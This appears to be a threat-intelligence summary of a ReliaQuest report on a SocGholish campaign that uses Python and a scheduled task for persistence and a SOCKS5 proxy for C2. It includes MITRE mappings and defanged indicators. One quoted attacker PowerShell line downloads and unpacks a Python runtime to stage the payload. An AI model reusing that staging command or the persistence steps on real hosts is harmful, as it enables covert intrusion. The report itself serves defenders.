ReliaQuest reports a new SocGholish evolution that uses Python to persist on hosts, signaling an evolution in its tactics beyond the Blister Loader. The infection chain starts with suspicious JavaScript (update.js) and moves through an ingress of Python, a hidden Python-based execution, and then a scheduled task to maintain persistence, with a SOCKS5 proxy used for C2 communications.
Keypoints
- ReliaQuest observes SocGholish evolving to use Python for persistence rather than Blister Loader.
- The campaign begins with JavaScript (update.js) delivered via drive-by compromise and executed through wscript.exe.
- Ingress includes downloading a Python embed package from python.org, expanding it, and preparing a Python environment.
- Execution relies on Python to run a script (hklib.py), with a SOCKS5 proxy-based C2 the script aims to establish.
- Persistence is achieved by creating a Windows Scheduled Task (pypi-py) that runs frequently (every 5 minutes).
- IOCs include a domain (oystergardens[dot]club), a hash (34b4d749924384409c12988f4c7690751f4b7f7c), and an IP (92.118.112[.]208) associated with the campaign.
MITRE Techniques
- [T1105] Ingress Tool Transfer – Ingress stage downloads python3.12.0 as a zip from the official repository and expands it for use. Quote: ‘Downloads python3.12.0 as “python.zip” from the official Python Foundation repository, confirms the download, and enumerates the download directory via the “ls” command.’
- [T1059.001] PowerShell – The download/extraction sequence is invoked via PowerShell, embedded in a cmd.exe call. Quote: ‘cmd.exe” /C powershell -c “wget hxxps[://]www[.]python[.]org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip -OutFile c:programdatapython.zip;ls c:programdatapython.zip;Expand-Archive -LiteralPath c:programdatapython.zip -DestinationPath c:programdatapy3;del c:programdatapython.zip;ls c:programdatapy3″‘
- [T1059.007] JavaScript – The campaign involves JavaScript files like update.js used in SocGholish campaigns. Quote: ‘including “update.js,” a common file name used by SocGholish and other fake-update malware variants.’
- [T1059.006] Python – Execution of Python scripts is used to stage and run the payload. Quote: ‘2. Executes the Python script “hklib.py” with the ingressed Python interpreter, “pythonw.exe”.’
- [T1053.005] Scheduled Task – A persistent task is created to execute the Python payload regularly. Quote: ‘3. The task “pypi-py” is set to execute every 5 minutes and then executed immediately.’
- [T1090] Proxy – The Python-based payload acts as a SOCKS5 proxy client to reach C2. Quote: ‘the hklib.py script is a SOCKS5 proxy client being used to establish a C2 connection to the IP and port specified in the command arguments.’
Indicators of Compromise
- [Domain] oystergardens[dot]club – Domain used in the campaign to host or fetch malicious resources.
- [Hash] 34b4d749924384409c12988f4c7690751f4b7f7c – File hash associated with the observed artifact(s) in the campaign.
- [IP] 92.118.112[.]208 – C2 or proxy destination used by the malware for command and control traffic.
Read more: https://www.reliaquest.com/blog/new-python-socgholish-infection-chain/